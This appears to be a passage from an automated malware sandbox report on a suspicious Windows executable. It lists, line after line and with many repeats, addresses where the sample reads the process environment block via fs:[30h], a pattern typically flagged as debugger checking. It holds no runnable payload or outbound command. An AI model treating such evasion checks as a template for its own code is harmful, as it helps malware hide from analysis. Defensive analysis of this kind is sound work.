          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AD250 mov ecx, dword ptr fs:[00000030h]2_2_333AD250
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F124C mov eax, dword ptr fs:[00000030h]2_2_333F124C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F124C mov eax, dword ptr fs:[00000030h]2_2_333F124C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F124C mov eax, dword ptr fs:[00000030h]2_2_333F124C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F124C mov eax, dword ptr fs:[00000030h]2_2_333F124C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF247 mov eax, dword ptr fs:[00000030h]2_2_333EF247
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335F24A mov eax, dword ptr fs:[00000030h]2_2_3335F24A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3332C2B0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334032C9 mov eax, dword ptr fs:[00000030h]2_2_334032C9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF2AE mov eax, dword ptr fs:[00000030h]2_2_333EF2AE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F92AB mov eax, dword ptr fs:[00000030h]2_2_333F92AB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333542AF mov eax, dword ptr fs:[00000030h]2_2_333542AF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333542AF mov eax, dword ptr fs:[00000030h]2_2_333542AF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333292AF mov eax, dword ptr fs:[00000030h]2_2_333292AF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337290 mov eax, dword ptr fs:[00000030h]2_2_33337290
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337290 mov eax, dword ptr fs:[00000030h]2_2_33337290
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337290 mov eax, dword ptr fs:[00000030h]2_2_33337290
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE289 mov eax, dword ptr fs:[00000030h]2_2_333AE289
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333402F9 mov eax, dword ptr fs:[00000030h]2_2_333402F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333272E0 mov eax, dword ptr fs:[00000030h]2_2_333272E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A2E0 mov eax, dword ptr fs:[00000030h]2_2_3333A2E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A2E0 mov eax, dword ptr fs:[00000030h]2_2_3333A2E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A2E0 mov eax, dword ptr fs:[00000030h]2_2_3333A2E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A2E0 mov eax, dword ptr fs:[00000030h]2_2_3333A2E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A2E0 mov eax, dword ptr fs:[00000030h]2_2_3333A2E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A2E0 mov eax, dword ptr fs:[00000030h]2_2_3333A2E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333382E0 mov eax, dword ptr fs:[00000030h]2_2_333382E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333382E0 mov eax, dword ptr fs:[00000030h]2_2_333382E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333382E0 mov eax, dword ptr fs:[00000030h]2_2_333382E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333382E0 mov eax, dword ptr fs:[00000030h]2_2_333382E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D2EC mov eax, dword ptr fs:[00000030h]2_2_3332D2EC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D2EC mov eax, dword ptr fs:[00000030h]2_2_3332D2EC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333532C5 mov eax, dword ptr fs:[00000030h]2_2_333532C5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B2BC mov eax, dword ptr fs:[00000030h]2_2_3340B2BC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B2BC mov eax, dword ptr fs:[00000030h]2_2_3340B2BC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B2BC mov eax, dword ptr fs:[00000030h]2_2_3340B2BC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B2BC mov eax, dword ptr fs:[00000030h]2_2_3340B2BC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF13E mov eax, dword ptr fs:[00000030h]2_2_333EF13E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33405149 mov eax, dword ptr fs:[00000030h]2_2_33405149
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333BA130 mov eax, dword ptr fs:[00000030h]2_2_333BA130
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33403157 mov eax, dword ptr fs:[00000030h]2_2_33403157
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33403157 mov eax, dword ptr fs:[00000030h]2_2_33403157
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33403157 mov eax, dword ptr fs:[00000030h]2_2_33403157
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33367128 mov eax, dword ptr fs:[00000030h]2_2_33367128
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33367128 mov eax, dword ptr fs:[00000030h]2_2_33367128
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F113 mov eax, dword ptr fs:[00000030h]2_2_3332F113
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360118 mov eax, dword ptr fs:[00000030h]2_2_33360118
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333510D mov eax, dword ptr fs:[00000030h]2_2_3333510D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3338717A mov eax, dword ptr fs:[00000030h]2_2_3338717A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3338717A mov eax, dword ptr fs:[00000030h]2_2_3338717A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33336179 mov eax, dword ptr fs:[00000030h]2_2_33336179
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336716D mov eax, dword ptr fs:[00000030h]2_2_3336716D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336415F mov eax, dword ptr fs:[00000030h]2_2_3336415F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A147 mov eax, dword ptr fs:[00000030h]2_2_3332A147
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A147 mov eax, dword ptr fs:[00000030h]2_2_3332A147
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A147 mov eax, dword ptr fs:[00000030h]2_2_3332A147
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333631BE mov eax, dword ptr fs:[00000030h]2_2_333631BE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333631BE mov eax, dword ptr fs:[00000030h]2_2_333631BE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333641BB mov ecx, dword ptr fs:[00000030h]2_2_333641BB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333641BB mov eax, dword ptr fs:[00000030h]2_2_333641BB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333641BB mov eax, dword ptr fs:[00000030h]2_2_333641BB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E1A4 mov eax, dword ptr fs:[00000030h]2_2_3336E1A4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E1A4 mov eax, dword ptr fs:[00000030h]2_2_3336E1A4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33359194 mov eax, dword ptr fs:[00000030h]2_2_33359194
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371190 mov eax, dword ptr fs:[00000030h]2_2_33371190
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371190 mov eax, dword ptr fs:[00000030h]2_2_33371190
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334180 mov eax, dword ptr fs:[00000030h]2_2_33334180
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334180 mov eax, dword ptr fs:[00000030h]2_2_33334180
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334180 mov eax, dword ptr fs:[00000030h]2_2_33334180
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333291F0 mov eax, dword ptr fs:[00000030h]2_2_333291F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333291F0 mov eax, dword ptr fs:[00000030h]2_2_333291F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401F1 mov eax, dword ptr fs:[00000030h]2_2_333401F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401F1 mov eax, dword ptr fs:[00000030h]2_2_333401F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401F1 mov eax, dword ptr fs:[00000030h]2_2_333401F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335F1F0 mov eax, dword ptr fs:[00000030h]2_2_3335F1F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335F1F0 mov eax, dword ptr fs:[00000030h]2_2_3335F1F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F81EE mov eax, dword ptr fs:[00000030h]2_2_333F81EE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F81EE mov eax, dword ptr fs:[00000030h]2_2_333F81EE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333391E5 mov eax, dword ptr fs:[00000030h]2_2_333391E5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333391E5 mov eax, dword ptr fs:[00000030h]2_2_333391E5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333281EB mov eax, dword ptr fs:[00000030h]2_2_333281EB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401C0 mov eax, dword ptr fs:[00000030h]2_2_333401C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401C0 mov eax, dword ptr fs:[00000030h]2_2_333401C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334051B6 mov eax, dword ptr fs:[00000030h]2_2_334051B6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340505B mov eax, dword ptr fs:[00000030h]2_2_3340505B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D02D mov eax, dword ptr fs:[00000030h]2_2_3332D02D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372010 mov ecx, dword ptr fs:[00000030h]2_2_33372010
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33355004 mov eax, dword ptr fs:[00000030h]2_2_33355004
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33355004 mov ecx, dword ptr fs:[00000030h]2_2_33355004
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33338009 mov eax, dword ptr fs:[00000030h]2_2_33338009
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337072 mov eax, dword ptr fs:[00000030h]2_2_33337072
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33336074 mov eax, dword ptr fs:[00000030h]2_2_33336074
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33336074 mov eax, dword ptr fs:[00000030h]2_2_33336074
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333D9060 mov eax, dword ptr fs:[00000030h]2_2_333D9060
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331051 mov eax, dword ptr fs:[00000030h]2_2_33331051
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33331051 mov eax, dword ptr fs:[00000030h]2_2_33331051
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360044 mov eax, dword ptr fs:[00000030h]2_2_33360044
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EB0AF mov eax, dword ptr fs:[00000030h]2_2_333EB0AF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333700A5 mov eax, dword ptr fs:[00000030h]2_2_333700A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF0A5 mov eax, dword ptr fs:[00000030h]2_2_333DF0A5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A093 mov ecx, dword ptr fs:[00000030h]2_2_3332A093
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332C090 mov eax, dword ptr fs:[00000030h]2_2_3332C090
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404080 mov eax, dword ptr fs:[00000030h]2_2_33404080
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332C0F6 mov eax, dword ptr fs:[00000030h]2_2_3332C0F6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336D0F0 mov eax, dword ptr fs:[00000030h]2_2_3336D0F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3336D0F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333290F8 mov eax, dword ptr fs:[00000030h]2_2_333290F8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334B0D0 mov eax, dword ptr fs:[00000030h]2_2_3334B0D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B0D6 mov eax, dword ptr fs:[00000030h]2_2_3332B0D6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334050B7 mov eax, dword ptr fs:[00000030h]2_2_334050B7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33359723 mov eax, dword ptr fs:[00000030h]2_2_33359723
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333471B mov eax, dword ptr fs:[00000030h]2_2_3333471B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333471B mov eax, dword ptr fs:[00000030h]2_2_3333471B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF717 mov eax, dword ptr fs:[00000030h]2_2_333EF717
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333D700 mov ecx, dword ptr fs:[00000030h]2_2_3333D700
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F970B mov eax, dword ptr fs:[00000030h]2_2_333F970B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F970B mov eax, dword ptr fs:[00000030h]2_2_333F970B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B705 mov eax, dword ptr fs:[00000030h]2_2_3332B705
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335270D mov eax, dword ptr fs:[00000030h]2_2_3335270D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335270D mov eax, dword ptr fs:[00000030h]2_2_3335270D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335270D mov eax, dword ptr fs:[00000030h]2_2_3335270D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360774 mov eax, dword ptr fs:[00000030h]2_2_33360774
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334779 mov eax, dword ptr fs:[00000030h]2_2_33334779
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334779 mov eax, dword ptr fs:[00000030h]2_2_33334779
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33342760 mov ecx, dword ptr fs:[00000030h]2_2_33342760
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
